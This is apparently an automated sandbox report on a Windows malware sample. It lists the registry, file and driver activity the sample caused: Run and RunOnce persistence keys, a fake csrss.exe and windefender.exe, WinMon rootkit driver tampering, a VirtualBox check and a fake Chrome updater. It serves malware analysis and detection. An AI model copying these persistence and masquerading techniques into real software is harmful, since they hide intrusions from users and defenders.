Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ay3zl0rC.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jB0xw0Vd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\IS2mS9Rs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20231010200520.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 700c1f23b5fbd901 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4C737611-67A8-11EE-A164-5EF5C936A496} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "403733278" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4CBA1C01-67A8-11EE-A164-5EF5C936A496} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bbd2da6efca7814e97bd67c6ea97aa8b00000000020000000000106600000001000020000000f5017001849e1695836db712ca9629e6c502373a0e3882b3ed2f8d968b50da47000000000e800000000200002000000041007478d3eb2696f8cc0ee12081f17d50e613aa3794d57642a47f6d27e1646e20000000d0507444fcfab0e5f26886ef4cf1e5d0d054168af53d392ec394b69203d1e1eb4000000064b868a0bfb0ef1006c7b0709e640b3f77bb121d4d32017bc45d05692f974c7e4c0a49b03525d6b01cd7eb2f59ce09d9d215f29f8fa42896cf2bd94fa3c21ae3 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bbd2da6efca7814e97bd67c6ea97aa8b00000000020000000000106600000001000020000000aef84777d1ffc60f8b2149c909aa5358e4b8393c5bcd29a40d51cef2b5807339000000000e80000000020000200000006833dcdf4950cff3ad8cd776a618d0722b9c93755393eb55e4f81b0e872f20c090000000b17407f58185053815d0d0d794d076bd553f5b9cbbca28d827364675faa6f011bd8ec3c7d0f64de31f0be976b8946baa11d0dafffc785105c83a4840af7bd69a0e1a146e88be13e7077adea0f306c031a0b844f011eb35c1d6601cbecd59421062a57fc520c62f454aa86cd8bfb53a98450e8e6b1170706b033116d21e974fbe084b61de8a635caf30095ecbd6b345e640000000e947cec91ea5d36a80ee56ca51b7205a96aa49b52be2fbe08b76320ad6d86a2f40a92760553ebffb0a33b9a18605482a5c1562c61fc8d4d4eb607b4a9eb84f37 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
